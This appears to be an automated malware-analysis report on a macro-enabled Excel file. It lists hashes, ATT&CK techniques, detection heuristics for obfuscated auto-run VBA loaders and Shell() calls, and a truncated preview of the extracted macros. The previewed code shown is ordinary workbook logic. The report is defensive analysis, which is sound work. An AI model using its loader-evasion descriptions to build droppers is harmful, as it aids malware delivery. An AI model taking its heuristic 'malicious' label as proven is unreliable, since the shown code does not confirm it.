Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 953e7bbfe14796ef…

MALICIOUS

Office (OOXML)

2.70 MB Created: 2016-06-27 09:21:24 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2019-11-20
MD5: 33f50f391754486f8341b7be318484d7 SHA-1: dfeab53bf00e72de9d67f138d421202bdddc9ca3 SHA-256: 953e7bbfe14796ef97f7384a1319eedcb893c33ddaeba92944eeb5fa270c91fc
230 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an OOXML Excel document containing a Workbook_Open macro, which is a common technique for executing malicious VBA code. The VBA code is heavily obfuscated and uses Shell() calls, indicating an attempt to download and execute a second-stage payload. The presence of hidden sheets further supports the malicious intent by concealing code or data.

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 10 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.mathsisfun.com/median.html In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 168546 bytes
SHA-256: f8288c0a85c102df63ea42d7acf3e737814bddd37bac5574eba12b265654482e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' v6.0 - 25072018 - 1621IST

Dim CalculationSetting As Integer
Dim ScreenUpdating As Boolean
Dim DisplayStatusBar  As Boolean
Dim EnableEvents  As Boolean

Private Sub Workbook_BeforeClose(Cancel As Boolean)
        On Error GoTo ErrorHandler
        Application.Calculation = xlCalculationAutomatic
        'Call LogEventTest
        ' Restore Client Settings
10      'Application.Calculation = CalculationSetting
20      'Application.ScreenUpdating = ScreenUpdating
30      'Application.DisplayStatusBar = DisplayStatusBar
40      'Application.EnableEvents = EnableEvents
            Exit Sub
ErrorHandler:
50          Call Module33.LogEvent(Err, "ThisWorkbook.Workbook_BeforeClose", Erl)
60          Call Module33.ErrorHandler
End Sub

Private Sub LogEventTest()
    On Error GoTo ErrorHandler
10    Dim t As Integer
20      t = 7 / 0
ErrorHandler:
50          Call Module33.LogEvent(Err, "ThisWorkbook.TestLog", Erl)
 End Sub
 
Private Sub Workbook_Open()
        On Error GoTo ErrorHandler
        
        ' Store Client Settings
70      CalculationSetting = Application.Calculation
80      ScreenUpdating = Application.ScreenUpdating
90      DisplayStatusBar = Application.DisplayStatusBar
100      EnableEvents = Application.EnableEvents
        
            'Sheet2.CommandButton1_Click
110    Application.Calculation = xlCalculationManual
111         Call Module31.FreezePane
        '    Sheet1.Visible = xlSheetHidden
        '    Sheet8.Visible = xlSheetHidden
120     If Sheet2.Cells(1, 30) = "1" Then
130         Call Module33.OptimizeCode_End_ExceptCalculation
                End
            End If
140     Call Module32.RunInitialMacros
            Exit Sub
ErrorHandler:
150         Call Module33.LogEvent(Err, "ThisWorkbook.Workbook_Open", Erl)
160         Call Module33.ErrorHandler
        End Sub
        
        Sub FillSupplyLOSCB()
            On Error GoTo ErrorHandler
            Dim startTime As Date
170     startTime = Now()

180         If ThisWorkbook.sheetExists("Sheet9") And Range("Sheet3!A3") > "" Then
         'Call FillComboFromSheet(Sheet9.CB_Supply_LOS, "listLOS1")
190          Call Module8.FillDropDownFromSheet(Sheet9, Sheet9.Shapes("dd_Supply_LOS"), "listLOS1", ThisWorkbook.Settings("SupplyLOS"))
        '    Dim val As String
        '    val = Sheet1.Cells(5, 1)
        '    If val > "" Then
        '        Sheet9.CB_Supply_LOS.Clear
        '        Sheet9.CB_Supply_LOS.List = Split(val, ",")
        '        Sheet9.CB_Supply_LOS.Text = Sheet9.CB_Supply_LOS.List(0)
        '    End If
        End If
200      Call Module33.LogTime("FillSupplyLOSCB", startTime, Now())
            Exit Sub
ErrorHandler:
210          Call Module33.LogEvent(Err, "ThisWorkbook.FillSupplyLOSCB", Erl)
220          Call Module33.ErrorHandler
        End Sub
        
        Sub FillOverviewLOSCB()
             On Error GoTo ErrorHandler
            Dim startTime As Date
230      startTime = Now()
240          If ThisWorkbook.sheetExists("Sheet4") And Range("Sheet3!A3") > "" Then
            
250      Call Module8.FillDropDownFromSheet(Sheet4, Sheet4.Shapes("dd_Overvw_LOS"), "listLOS1", ThisWorkbook.Settings("OverviewLOS"))
        'Call FillComboFromSheet(Sheet4.cb_Overvw_LOS, "listLOS1")
            
        '    Dim val As String
        '    val = Sheet4.cb_Overvw_LOS.value
        '    If val = "" Then
        '        Sheet4.cb_Overvw_LOS.ListFillRange = ""
        '        Sheet4.cb_Overvw_LOS.ListFillRange = "ListLOS"
        '        Sheet4.cb_Overvw_LOS.Text = Sheet4.cb_Overvw_LOS.List(0)
        '    End If
            
            Dim val2 As String
260          val2 = Sheet4.Cells(10, 1)
270          If val2 = "" Then
280    
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 663552 bytes
SHA-256: 635ae8acea6c84f21d88d617307f05891c8231c893ec132f8bf168b001333d92

Open this report in the interactive analyzer, or submit your own file for analysis.